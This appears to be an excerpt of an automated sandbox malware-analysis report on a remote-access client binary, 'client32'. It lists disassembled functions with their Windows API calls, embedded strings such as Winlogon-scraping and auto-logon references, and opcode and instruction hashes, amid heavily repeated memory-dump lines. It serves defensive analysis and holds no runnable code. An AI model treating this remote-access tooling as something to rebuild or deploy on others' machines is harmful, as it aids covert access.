                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: HasListener()$e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h
                                                                              • API String ID: 1338273076-3267820813
                                                                              • Opcode ID: 3a5f3d62879c966fc82f418f694905d75f14910616183289d6c69cf165eafd22
                                                                              • Instruction ID: 72efe913c15dd2a825e40b83131ec7a5b7bb91afe0206afba866435cf9ee8433
                                                                              • Opcode Fuzzy Hash: 3a5f3d62879c966fc82f418f694905d75f14910616183289d6c69cf165eafd22
                                                                              • Instruction Fuzzy Hash: 88716179E00259EFCB05DFA8D880BEEFBF8EF58314F104559E415A7280DB75AA44CBA1
                                                                              Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                              • std::exception::exception.LIBCMT ref: 11053483
                                                                              • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 2181554437-3415836059
                                                                              • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                              • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                              Function 11012090 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: swprintf
                                                                              • String ID: $$%$+
                                                                              • API String ID: 233258989-3202472541
                                                                              • Opcode ID: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
                                                                              • Instruction ID: 709c54241741de87a29271ffeb556a2f401356d1bb5d83c5dcf625fd940d7789
                                                                              • Opcode Fuzzy Hash: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
                                                                              • Instruction Fuzzy Hash: 6C515EF6E002499ADB16CE58C8847CE7BF5FB15304F3085C5ED44AB29AEA3DC994CB90
                                                                              Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: General$TicklePeriod
                                                                              • API String ID: 536389180-1546705386
                                                                              • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                              • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                              Function 1104E150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncpy
                                                                              • String ID: Client.
                                                                              • API String ID: 2961919466-3668916897
                                                                              • Opcode ID: d86f3a707c83068dca8de9a6e42235728c30fc8aa8edad40bfa430c4d183c61d
                                                                              • Instruction ID: afd3e16b167e0e58be9e44bf621a1c8a112985171a3aa2381e53f24449598869
                                                                              • Opcode Fuzzy Hash: d86f3a707c83068dca8de9a6e42235728c30fc8aa8edad40bfa430c4d183c61d
                                                                              • Instruction Fuzzy Hash: 87419475E0425AAFDB10CF78CC84BDEBBF9AF09314F1441A9D948A7241E775BA04CB90
                                                                              Function 110363C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 110363CF
                                                                              • EnumChildWindows.USER32(?,Function_00035F30), ref: 1103640C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 110343E0: IsWindow.USER32(?), ref: 110343E8
                                                                                • Part of subcall function 110343E0: GetWindowLongA.USER32(?,000000F0), ref: 110343FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
                                                                              • String ID: CltAutoLogon.cpp$IsWindow(hDia)
                                                                              • API String ID: 2743442841-2884807542
                                                                              • Opcode ID: 975b895f4caacf8fdd8b9513a7fe3ee3cb2752b060bb9e31cc638f616adf73a8
                                                                              • Instruction ID: 11eaf539b08052b8f60daf16ff22fa14e936f015058a14bf0137899c3d76b31f
                                                                              • Opcode Fuzzy Hash: 975b895f4caacf8fdd8b9513a7fe3ee3cb2752b060bb9e31cc638f616adf73a8
                                                                              • Instruction Fuzzy Hash: 0041BD75D20301AFC320DF25DD80AAAB7F5BF8071AF40846DD88A87A50EB31F644CB91
                                                                              Function 110881D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110886C0: _memset.LIBCMT ref: 110886DF
                                                                                • Part of subcall function 110886C0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              • _memset.LIBCMT ref: 110882DA
                                                                              • _free.LIBCMT ref: 110882F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset$CriticalInitializeSection_free
                                                                              • String ID: ..\CTL32\EncryptFuncs.cpp$pDES
                                                                              • API String ID: 1034327355-4272885995
                                                                              • Opcode ID: a6079e7af03cf179f1442b63be17b6fca14849e1020515595784f8ae75675a4f
                                                                              • Instruction ID: 8ae3569bce46c35fff43cf137a49856f5cdc42b16756a4486f25bf6ba65b23e7
                                                                              • Opcode Fuzzy Hash: a6079e7af03cf179f1442b63be17b6fca14849e1020515595784f8ae75675a4f
                                                                              • Instruction Fuzzy Hash: F041C675E04219AFDB20CF54CC41FAEB379EB85718F004298E90867380EB76AE54CB91
                                                                              Function 1105A270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: Stop reconn to %s
                                                                              • API String ID: 536389180-2663412807
                                                                              • Opcode ID: 28e149f9e8b9339cc5936daff1c8ccc8a0dde33bbe7dbcef04bf713a6a8c9fee
                                                                              • Instruction ID: ee841f7b2cabced5480f0adf42a1d2d70c561a2002c4d621d613019b8fea0109
                                                                              • Opcode Fuzzy Hash: 28e149f9e8b9339cc5936daff1c8ccc8a0dde33bbe7dbcef04bf713a6a8c9fee
                                                                              • Instruction Fuzzy Hash: 85319235E00615CFD760CFBCC980A6AB7F5EB89304F1046A9E45AC7645DB71E984CB50
                                                                              Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 110D1378
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                              • API String ID: 1528188558-323366856
                                                                              • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                              • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                              Function 1104A260 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 1104A2B6
                                                                              • GetTickCount.KERNEL32 ref: 1104A2D8
                                                                                • Part of subcall function 1103DD20: CloseHandle.KERNEL32(00000000,110B7A30,00000001,00000000,?), ref: 1103DDC2
                                                                              Strings
                                                                              • ScrapeWinlogon(true), mode=%x, flags=%x, xrefs: 1104A293
                                                                              • ScrapeWinlogon(false), xrefs: 1104A2FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CloseHandle
                                                                              • String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true), mode=%x, flags=%x
                                                                              • API String ID: 3288320179-399146346
                                                                              • Opcode ID: bef47f98c8d1ca0611a16be0c1ef2ecc0455f5e92cee3a788b3969f9fb13bb47
                                                                              • Instruction ID: 87290cdcf1103bc3334aeb70066b7a5708590451a5d5a05059d6374ecb706078
                                                                              • Opcode Fuzzy Hash: bef47f98c8d1ca0611a16be0c1ef2ecc0455f5e92cee3a788b3969f9fb13bb47
                                                                              • Instruction Fuzzy Hash: 74213475F00700ABF725D6649885BFEBAC5AB8070DF248839F65B46AC0DBE5B5C0C342
                                                                              Function 110183B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                              • GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                              • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11018429
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$FindWindow
                                                                              • String ID: IPTip_Main_Window
                                                                              • API String ID: 3964754823-293399287
                                                                              • Opcode ID: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                              • Instruction ID: 48eceb47ebeb3c7c94f5e0ea21fac0982c3091e714c0091f6a40e808b7a20a73
                                                                              • Opcode Fuzzy Hash: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                              • Instruction Fuzzy Hash: 1411E53AD80229A7DF01DAE05E41BDE77AC5B00249F0045EBED05AB048EE69D70586E1
                                                                              Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
